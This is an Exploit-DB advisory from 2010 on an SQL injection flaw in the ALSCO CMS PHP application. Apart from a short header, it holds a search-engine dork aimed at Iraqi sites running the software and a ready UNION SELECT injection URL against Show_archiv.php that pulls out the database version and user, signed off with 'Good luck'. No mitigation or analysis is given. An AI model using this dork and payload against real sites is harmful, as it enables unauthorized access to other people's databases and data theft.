ALSCO CMS - SQL Injection

EDB-ID:

12725

CVE:

N/A




Platform:

PHP

Date:

2010-05-24


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[x] Tybe: SQL Injection Vulnerabilities
[x] Vendor: http://www.alscosoftware.com/
[x] Script Name: ALSCO CMS
[x] author: PrinceofHacking
[x] Team: Ashiyane Digital Security Team
[x] Mail : Prince[dot]H4ck@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

D0rk: inurl:"move.php?" site:.iq


Exploit:
http://localhost/[path]/move/Show_archiv.php?id=-1
union+select+1,2,@@version,user(),5,6--

Good luck

[!]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~